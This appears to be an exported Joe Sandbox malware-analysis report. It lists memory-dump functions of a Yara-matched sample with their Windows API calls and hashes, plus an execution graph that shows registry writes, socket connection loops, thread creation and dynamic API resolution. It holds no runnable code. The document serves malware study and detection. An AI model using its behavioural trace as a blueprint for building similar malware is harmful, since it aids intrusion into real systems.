• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
• Instruction ID: 17adc197110b36588a71e7b22d1a82566b7d6dd61c07d783f2103aff8f8b80d8
• Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
• Instruction Fuzzy Hash: 8CC13671904205EBDB25EF78CD44BAEBBBDEF85310F3441AED484A7250E7718A41CB92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • API String ID: 1036877536-0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028FE297
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028FE2B3
                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028FE32A
                                                          • VariantClear.OLEAUT32(?), ref: 028FE353
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Similarity
                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                          • API String ID: 920484758-0
                                                          APIs
                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FAD59
                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FAD7D
                                                          • GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD98
                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FAE2E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Similarity
                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                          • API String ID: 3990497365-0
                                                          APIs
                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FAD59
                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FAD7D
                                                          • GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD98
                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FAE2E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Similarity
                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                          • API String ID: 3990497365-0
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 029B0E8A
                                                            • Part of subcall function 029B14C2: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 029B14F1
                                                            • Part of subcall function 029B14C2: ___AdjustPointer.LIBCMT ref: 029B150C
                                                          • _UnwindNestedFrames.LIBCMT ref: 029B0EA1
                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 029B0EB3
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 029B0ED7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Similarity
                                                          • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                          • API String ID: 2901542994-0
                                                          APIs
                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 029B0541
                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 029B0546
                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 029B054B
                                                            • Part of subcall function 029B1A4A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 029B1A5B
                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 029B0560
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Similarity
                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                          • API String ID: 1761009282-0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: e~E$NG
                                                          • API String ID: 3519838083-1735957280
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Similarity
                                                          • API ID: __fassign
                                                          • String ID: PkGNG
                                                          • API String ID: 3965848254-263838557
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Similarity
                                                          • API ID: _memcmp_wcslen
                                                          • String ID: ?
                                                          • API String ID: 1846113162-1684325040
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Similarity
                                                          • API ID: _strftime
                                                          • String ID: dMG$|MG
                                                          • API String ID: 1867682108-1683252805
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          APIs
                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028F95DA), ref: 028F9572
                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028F95DA), ref: 028F9578
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DateFormatLocaleThread
                                                          • String ID: yyyy
                                                          • API String ID: 3303714858-3145165042
                                                          • Opcode ID: 60d1affd2a8eed54d3ebca7c846d59a2599a8089dbf611d2c1a0a4dbb8c56749
                                                          • Instruction ID: 3584ea6a0e79893bb4c4632636ebd117d26ab62de3549235eab68ce9e257324a
                                                          • Opcode Fuzzy Hash: 60d1affd2a8eed54d3ebca7c846d59a2599a8089dbf611d2c1a0a4dbb8c56749
                                                          • Instruction Fuzzy Hash: 6A21627DA002589FDB90DFA8C841BAE73B9EF49700F5140A6EB05E7250D7349E40CB66
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: o~E$NG
                                                          • API String ID: 3519838083-4065726910
                                                          • Opcode ID: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                          • Instruction ID: dc578a174085ae21784887ac2044c5035be5942e22ef08b06ca87190acc20a66
                                                          • Opcode Fuzzy Hash: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                          • Instruction Fuzzy Hash: FC213132D001089BDB14EBA4E856AEEB776EFD4720F20816AA519A2190EF351E49CF54
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029083C2), ref: 029083A4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                          • String ID: FlushInstructionCache$Kernel32
                                                          • API String ID: 3811539418-184458249
                                                          • Opcode ID: 6013f5392a6df9d0bf19102ad744d92c18f6d1b629aea6edfb25404938350080
                                                          • Instruction ID: 0aebe87da6ddc07a96364430b1fe49e960eff07797f7b21a42fff8e2da21e9fb
                                                          • Opcode Fuzzy Hash: 6013f5392a6df9d0bf19102ad744d92c18f6d1b629aea6edfb25404938350080
                                                          • Instruction Fuzzy Hash: 91016D79744308AFEB40EFE8EC81FAB77EDFB88B00F514461BA04D6680D670AD148B25
                                                          APIs
                                                            • Part of subcall function 029ABD91: __onexit.LIBCMT ref: 029ABD97
                                                          • __Init_thread_footer.LIBCMT ref: 029884F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: ,kG$0kG
                                                          • API String ID: 1881088180-2015055088
                                                          • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                          • Instruction ID: 469d538b52e2bb4beaa54fda6e2500d7d400b0bdad1f2495b4f0ed660714a6e1
                                                          • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                                          • Instruction Fuzzy Hash: C7E0D833100B218EC104B338D560A9537DBFB8A7287A5802BD40CD62D0CF1A64418DAD
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocValue
                                                          • String ID: (y]
                                                          • API String ID: 1189806713-574103996
                                                          • Opcode ID: e9afe0d3b98ccaabb66b72c5c6a291bc32c40443ea37f01570cb9b848997acad
                                                          • Instruction ID: 4c82b34636d174fe97c8dc3d4f0ae2f73c5470c1c64e50edb92734db9b07bab6
                                                          • Opcode Fuzzy Hash: e9afe0d3b98ccaabb66b72c5c6a291bc32c40443ea37f01570cb9b848997acad
                                                          • Instruction Fuzzy Hash: 55C0026CD4571546EB44BB799444A15379D9F20704B40CB156B64C714DFB34C414DF52
                                                          APIs
                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AF58
                                                          • IsBadWritePtr.KERNEL32(?,00000004), ref: 0290AF88
                                                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 0290AFA7
                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AFB3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Read$Write
                                                          • String ID:
                                                          • API String ID: 3448952669-0
                                                          • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                          • Instruction ID: f76193f5ddc5a978fbb655fcb249b00a8aeb53c20c40a3269ef15f7719be71ad
                                                          • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                          • Instruction Fuzzy Hash: 1B216FB66407199FDB10DE6ACDC0BAA73A9EF40356F004521EF14D7281E778E81186D0

                                                          Execution Graph

                                                          Execution Coverage:4.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:4.7%
                                                          Total number of Nodes:1545
                                                          Total number of Limit Nodes:64
47540 2fab3c1 47539->47540 47542 2fab3cc StrToIntA 47540->47542 47541->47100 47543 2fab3da 47542->47543 47544 2fab3e3 47542->47544 48018 2facffa 22 API calls 47543->48018 47546 2f91fd8 11 API calls 47544->47546 47546->47541 47548 2f97765 47547->47548 47549 2fa3584 3 API calls 47548->47549 47550 2f9776c 47549->47550 47550->47111 47550->47112 47552 2fabd03 47551->47552 48019 2f9b93f 47552->48019 47554 2fabd0b 47554->47128 47556 2f91f22 47555->47556 47563 2f91f6a 47555->47563 47557 2f92252 11 API calls 47556->47557 47558 2f91f2b 47557->47558 47559 2f91f6d 47558->47559 47561 2f91f46 47558->47561 48052 2f92336 47559->48052 48051 2f9305c 28 API calls 47561->48051 47564 2f91f09 47563->47564 47565 2f92252 11 API calls 47564->47565 47566 2f91f12 47565->47566 47566->47141 47568 2fa39a0 47567->47568 47569 2f96e13 28 API calls 47568->47569 47570 2fa39b5 47569->47570 47571 2f920f6 28 API calls 47570->47571 47572 2fa39c5 47571->47572 47573 2fa37aa 14 API calls 47572->47573 47574 2fa39cf 47573->47574 47575 2f91fd8 11 API calls 47574->47575 47576 2fa39dc 47575->47576 47576->47189 47578 2f9209b 47577->47578 47579 2f923ce 11 API calls 47578->47579 47580 2f920a6 47579->47580 48056 2f924ed 47580->48056 47584 2fa37fa 47583->47584 47585 2fa37c3 47583->47585 47586 2f91fd8 11 API calls 47584->47586 47588 2fa37d5 RegSetValueExA RegCloseKey 47585->47588 47587 2f9efd9 47586->47587 47587->47191 47588->47584 47590 2fcbb45 _swprintf 47589->47590 48060 2fcae83 47590->48060 47592 2f9eff2 47592->47197 47592->47199 47594 2fab631 47593->47594 47595 2fab596 GetLocalTime 47593->47595 47596 2f91fd8 11 API calls 47594->47596 47597 2f9531e 28 API calls 47595->47597 47598 2fab639 47596->47598 47599 2fab5d8 47597->47599 47601 2f91fd8 11 API calls 47598->47601 47600 2f96383 28 API calls 47599->47600 47602 2fab5e4 47600->47602 47603 2f9f048 47601->47603 48087 2f92f10 47602->48087 47603->47215 47606 2f96383 28 API calls 47607 2fab5fc 47606->47607 48092 2f9723b 76 API calls 47607->48092 47609 2fab60a 47610 
2f91fd8 11 API calls 47609->47610 47611 2fab616 47610->47611 47612 2f91fd8 11 API calls 47611->47612 47613 2fab61f 47612->47613 47614 2f91fd8 11 API calls 47613->47614 47615 2fab628 47614->47615 47616 2f91fd8 11 API calls 47615->47616 47616->47594 47618 2f99e3d _wcslen 47617->47618 47619 2f99e48 47618->47619 47620 2f99e5f 47618->47620 47621 2f9da6f 31 API calls 47619->47621 47622 2f9da6f 31 API calls 47620->47622 47623 2f99e50 47621->47623 47624 2f99e67 47622->47624 47625 2f91f13 28 API calls 47623->47625 47626 2f91f13 28 API calls 47624->47626 47641 2f99e5a 47625->47641 47627 2f99e75 47626->47627 47628 2f91f09 11 API calls 47627->47628 47630 2f99e7d 47628->47630 47629 2f91f09 11 API calls 47631 2f99eb4 47629->47631 48111 2f99196 28 API calls 47630->48111 48096 2f9a144 47631->48096 47633 2f99e8f 48112 2f93014 47633->48112 47638 2f91f13 28 API calls 47639 2f99ea4 47638->47639 47640 2f91f09 11 API calls 47639->47640 47640->47641 47641->47629 48316 2f9417e 47642->48316 47647 2f93014 28 API calls 47648 2fab703 47647->47648 47649 2f91f09 11 API calls 47648->47649 47650 2fab70c 47649->47650 47651 2f91f09 11 API calls 47650->47651 47652 2f9f25e 47651->47652 47652->47268 47654 2fa355b RegQueryValueExA RegCloseKey 47653->47654 47655 2f9f31f 47653->47655 47654->47655 47655->47140 47655->47296 47657 2fa3a7a RegDeleteValueW 47656->47657 47658 2f9f3cd 47656->47658 47657->47658 47658->47135 47660 2f9dd96 47659->47660 47661 2fa353a 3 API calls 47660->47661 47662 2f9dd9d 47661->47662 47666 2f9ddbc 47662->47666 48410 2f91707 47662->48410 47664 2f9ddaa 48413 2fa38b2 RegCreateKeyA 47664->48413 47667 2fa4f65 47666->47667 47668 2f920df 11 API calls 47667->47668 47669 2fa4f79 47668->47669 48427 2fab944 47669->48427 47672 2f920df 11 API calls 47673 2fa4f8f 47672->47673 47674 2f91e65 22 API calls 47673->47674 47675 2fa4f9d 47674->47675 47676 2fcbb2c 39 API calls 47675->47676 47677 2fa4faa 47676->47677 47678 2fa4faf Sleep 47677->47678 47679 2fa4fbc 47677->47679 47678->47679 47680 2f92093 
28 API calls 47679->47680 47681 2fa4fcb 47680->47681 47682 2f91e65 22 API calls 47681->47682 47683 2fa4fd4 47682->47683 47684 2f920f6 28 API calls 47683->47684 47685 2fa4fdf 47684->47685 47686 2fabeac 28 API calls 47685->47686 47687 2fa4fe7 47686->47687 48431 2f9489e WSAStartup 47687->48431 47689 2fa4ff1 47690 2f91e65 22 API calls 47689->47690 47691 2fa4ffa 47690->47691 47692 2f91e65 22 API calls 47691->47692 47739 2fa5079 47691->47739 47693 2fa5013 47692->47693 47694 2f91e65 22 API calls 47693->47694 47696 2fa5024 47694->47696 47695 2f920f6 28 API calls 47695->47739 47698 2f91e65 22 API calls 47696->47698 47697 2fabeac 28 API calls 47697->47739 47699 2fa5035 47698->47699 47701 2f91e65 22 API calls 47699->47701 47700 2f96c59 28 API calls 47700->47739 47702 2fa5046 47701->47702 47703 2f91e65 22 API calls 47702->47703 47705 2fa5057 47703->47705 47704 2f91fe2 28 API calls 47704->47739 47706 2f91e65 22 API calls 47705->47706 47707 2fa5069 47706->47707 48568 2f9473d 88 API calls 47707->48568 47710 2fa51c7 WSAGetLastError 48569 2facb72 30 API calls 47710->48569 47715 2fa51d7 47720 2f91e65 22 API calls 47715->47720 47721 2f91e8d 11 API calls 47715->47721 47722 2fcbb2c 39 API calls 47715->47722 47715->47739 47759 2f92093 28 API calls 47715->47759 47760 2fab580 79 API calls 47715->47760 47761 2fa5aac CreateThread 47715->47761 47762 2f91fd8 11 API calls 47715->47762 47763 2f91f09 11 API calls 47715->47763 48570 2f952fd 28 API calls 47715->48570 48572 2f9b08c 84 API calls 47715->48572 48573 2f94e26 98 API calls 47715->48573 47718 2f91e65 22 API calls 47718->47739 47719 2f9531e 28 API calls 47719->47739 47720->47715 47721->47715 47724 2fa5b0a Sleep 47722->47724 47723 2f96383 28 API calls 47723->47739 47724->47715 47725 2f92f10 28 API calls 47725->47739 47726 2f92093 28 API calls 47726->47739 47727 2fab580 79 API calls 47727->47739 47728 2f91fd8 11 API calls 47728->47739 47731 2f99097 28 API calls 47731->47739 47732 2fd1ed1 20 API calls 47732->47739 47733 2fa3733 3 API calls 
47733->47739 47734 2fa35e1 31 API calls 47734->47739 47735 2f9417e 28 API calls 47735->47739 47739->47695 47739->47697 47739->47700 47739->47704 47739->47710 47739->47715 47739->47718 47739->47719 47739->47723 47739->47725 47739->47726 47739->47727 47739->47728 47739->47731 47739->47732 47739->47733 47739->47734 47739->47735 47740 2fabc1f 28 API calls 47739->47740 47741 2f91e65 22 API calls 47739->47741 48432 2fa4f24 47739->48432 48437 2f9482d 47739->48437 48444 2f94f51 47739->48444 48459 2f948c8 connect 47739->48459 48519 2fab871 47739->48519 48522 2fa45f8 47739->48522 48525 2f9ddc4 47739->48525 48531 2fabcd3 47739->48531 48534 2fabdaf 47739->48534 47740->47739 47742 2fa5474 GetTickCount 47741->47742 47743 2fabc1f 28 API calls 47742->47743 47755 2fa5491 47743->47755 47745 2fabc1f 28 API calls 47745->47755 47748 2fabdaf 28 API calls 47748->47755 47750 2f96383 28 API calls 47750->47755 47751 2f92ea1 28 API calls 47751->47755 47752 2f92f10 28 API calls 47752->47755 47754 2f91fd8 11 API calls 47754->47755 47755->47745 47755->47748 47755->47750 47755->47751 47755->47752 47755->47754 47756 2f91f09 11 API calls 47755->47756 48538 2fabb77 47755->48538 48540 2fabb27 47755->48540 48545 2f9f90c GetLocaleInfoA 47755->48545 48548 2f92f31 28 API calls 47755->48548 48549 2f94c10 47755->48549 48571 2f94aa1 60 API calls _Yarn 47755->48571 47756->47755 47759->47715 47760->47715 47761->47715 48718 2faada8 104 API calls 47761->48718 47762->47715 47763->47715 47764->47053 47765->47060 47766->47065 47769 2f920df 11 API calls 47768->47769 47770 2f96c65 47769->47770 47771 2f932a0 28 API calls 47770->47771 47772 2f96c82 47771->47772 47772->47088 47774 2f9ebdf 47773->47774 47775 2fa35ae RegQueryValueExA RegCloseKey 47773->47775 47774->47083 47774->47099 47775->47774 47776->47107 47777->47119 47778->47112 47779->47102 47780->47117 47782 2f91f86 11 API calls 47781->47782 47783 2f9da8b 47782->47783 47784 2f9daab 47783->47784 47785 2f9dae0 47783->47785 47787 2f9daa1 47783->47787 48719 2fab645 
29 API calls 47784->48719 47788 2fac048 GetCurrentProcess 47785->47788 47786 2f9dbd4 GetLongPathNameW 47790 2f9417e 28 API calls 47786->47790 47787->47786 47791 2f9dae5 47788->47791 47793 2f9dbe9 47790->47793 47794 2f9dae9 47791->47794 47795 2f9db3b 47791->47795 47792 2f9dab4 47796 2f91f13 28 API calls 47792->47796 47797 2f9417e 28 API calls 47793->47797 47799 2f9417e 28 API calls 47794->47799 47798 2f9417e 28 API calls 47795->47798 47800 2f9dabe 47796->47800 47801 2f9dbf8 47797->47801 47802 2f9db49 47798->47802 47803 2f9daf7 47799->47803 47804 2f91f09 11 API calls 47800->47804 48722 2f9de0c 28 API calls 47801->48722 47808 2f9417e 28 API calls 47802->47808 47809 2f9417e 28 API calls 47803->47809 47804->47787 47806 2f9dc0b 48723 2f92fa5 28 API calls 47806->48723 47811 2f9db5f 47808->47811 47812 2f9db0d 47809->47812 47810 2f9dc16 48724 2f92fa5 28 API calls 47810->48724 48721 2f92fa5 28 API calls 47811->48721 48720 2f92fa5 28 API calls 47812->48720 47816 2f9db18 47820 2f91f13 28 API calls 47816->47820 47817 2f9dc20 47821 2f91f09 11 API calls 47817->47821 47818 2f9db6a 47819 2f91f13 28 API calls 47818->47819 47822 2f9db75 47819->47822 47823 2f9db23 47820->47823 47824 2f9dc2a 47821->47824 47826 2f91f09 11 API calls 47822->47826 47827 2f91f09 11 API calls 47823->47827 47825 2f91f09 11 API calls 47824->47825 47828 2f9dc33 47825->47828 47829 2f9db7e 47826->47829 47830 2f9db2c 47827->47830 47831 2f91f09 11 API calls 47828->47831 47832 2f91f09 11 API calls 47829->47832 47833 2f91f09 11 API calls 47830->47833 47834 2f9dc3c 47831->47834 47832->47800 47833->47800 47835 2f91f09 11 API calls 47834->47835 47836 2f9dc45 47835->47836 47837 2f91f09 11 API calls 47836->47837 47838 2f9dc4e 47837->47838 47838->47177 47839->47190 47840->47211 47842 2fa3759 RegQueryValueExA RegCloseKey 47841->47842 47843 2fa377d 47841->47843 47842->47843 47843->47170 47844->47204 47851 2fc4563 47845->47851 47846 2fcbda0 _Yarn 21 API calls 47846->47851 47847 2f9f10c 47847->47242 47851->47846 47851->47847 
48725 2fd3001 7 API calls 2 library calls 47851->48725 48726 2fc4c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47851->48726 48727 2fc52fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47851->48727 47852->47273 47853->47261 47855->47305 47856->47110 47859 2f9f419 47858->47859 47860 2fab556 LoadResource LockResource SizeofResource 47858->47860 47861 2fcbda0 47859->47861 47860->47859 47866 2fd61b8 ___crtLCMapStringA 47861->47866 47862 2fd61f6 47878 2fd062d 20 API calls __dosmaperr 47862->47878 47863 2fd61e1 RtlAllocateHeap 47865 2fd61f4 47863->47865 47863->47866 47865->47447 47866->47862 47866->47863 47877 2fd3001 7 API calls 2 library calls 47866->47877 47869 2f920bf 47868->47869 47879 2f923ce 47869->47879 47871 2f920ca 47883 2f9250a 47871->47883 47873 2f920d9 47873->47450 47875 2f920b7 28 API calls 47874->47875 47876 2f96e27 47875->47876 47876->47457 47877->47866 47878->47865 47880 2f923d8 47879->47880 47881 2f92428 47879->47881 47880->47881 47890 2f927a7 11 API calls std::_Deallocate 47880->47890 47881->47871 47884 2f9251a 47883->47884 47885 2f92520 47884->47885 47886 2f92535 47884->47886 47891 2f92569 47885->47891 47901 2f928e8 28 API calls 47886->47901 47889 2f92533 47889->47873 47890->47881 47902 2f92888 47891->47902 47893 2f9257d 47894 2f92592 47893->47894 47895 2f925a7 47893->47895 47907 2f92a34 22 API calls 47894->47907 47909 2f928e8 28 API calls 47895->47909 47898 2f9259b 47908 2f929da 22 API calls 47898->47908 47900 2f925a5 47900->47889 47901->47889 47903 2f92890 47902->47903 47904 2f92898 47903->47904 47910 2f92ca3 22 API calls 47903->47910 47904->47893 47907->47898 47908->47900 47909->47900 47912 2f920e7 47911->47912 47913 2f923ce 11 API calls 47912->47913 47914 2f920f2 47913->47914 47914->47466 47929 2f9423a 47915->47929 47919 2faced2 47918->47919 47920 2facf31 47919->47920 47926 2facee2 47919->47926 47921 2facf4b 47920->47921 47922 2fad071 28 API calls 47920->47922 47944 2fad1d7 28 API calls 
47921->47944 47922->47921 47924 2facf2d 47924->47466 47925 2facf1a 47943 2fad1d7 28 API calls 47925->47943 47926->47925 47935 2fad071 47926->47935 47930 2f94243 47929->47930 47931 2f923ce 11 API calls 47930->47931 47932 2f9424e 47931->47932 47933 2f92569 28 API calls 47932->47933 47934 2f941b5 47933->47934 47934->47466 47937 2fad079 47935->47937 47936 2fad0ab 47936->47925 47937->47936 47938 2fad0af 47937->47938 47939 2fad093 47937->47939 47955 2f92725 22 API calls 47938->47955 47945 2fad0e2 47939->47945 47943->47924 47944->47924 47946 2fad0ec __EH_prolog 47945->47946 47956 2f92717 22 API calls 47946->47956 47948 2fad0ff 47957 2fad1ee 11 API calls 47948->47957 47950 2fad125 47951 2fad15d 47950->47951 47958 2f92730 11 API calls 47950->47958 47951->47936 47953 2fad144 47959 2f92712 11 API calls std::_Deallocate 47953->47959 47956->47948 47957->47950 47958->47953 47959->47951 47960->47489 47961->47494 47962->47491 47965 2f932aa 47964->47965 47967 2f932c9 47965->47967 47968 2f928e8 28 API calls 47965->47968 47967->47505 47968->47967 47970 2f951fb 47969->47970 47979 2f95274 47970->47979 47972 2f95208 47972->47508 47974 2f92061 47973->47974 47975 2f923ce 11 API calls 47974->47975 47976 2f9207b 47975->47976 48003 2f9267a 47976->48003 47980 2f95282 47979->47980 47981 2f95288 47980->47981 47982 2f9529e 47980->47982 47990 2f925f0 47981->47990 47983 2f952f5 47982->47983 47984 2f952b6 47982->47984 48000 2f928a4 22 API calls 47983->48000 47989 2f9529c 47984->47989 47999 2f928e8 28 API calls 47984->47999 47989->47972 47991 2f92888 22 API calls 47990->47991 47992 2f92602 47991->47992 47993 2f92629 47992->47993 47994 2f92672 47992->47994 47998 2f9263b 47993->47998 48001 2f928e8 28 API calls 47993->48001 48002 2f928a4 22 API calls 47994->48002 47998->47989 47999->47989 48001->47998 48004 2f9268b 48003->48004 48005 2f923ce 11 API calls 48004->48005 48006 2f9208d 48005->48006 48006->47511 48007->47519 48008->47525 48011 2fab362 48010->48011 48012 2fac055 GetCurrentProcess 48010->48012 
